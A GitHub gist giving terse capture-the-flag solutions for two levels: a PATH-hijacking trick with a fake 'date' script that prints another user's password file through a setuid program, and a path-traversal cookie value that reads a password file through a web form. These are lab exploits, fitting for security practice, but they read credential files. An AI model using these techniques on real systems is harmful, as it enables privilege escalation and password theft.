Skip to content

Instantly share code, notes, and snippets.

@shadabahmed
Created February 23, 2012 06:43
Show Gist options
  • Select an option

  • Save shadabahmed/1891141 to your computer and use it in GitHub Desktop.

Select an option

Save shadabahmed/1891141 to your computer and use it in GitHub Desktop.
Level 1:
cd /tmp
echo "cat /home/level02/.password" > date
chmod +x date
PATH=`pwd`:$PATH
export PATH
/levels/level01
Level 2:
In javascript console before submitting the form:
document.cookie = "user_details=../../home/level03/.password"
Submit and you will have the password
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment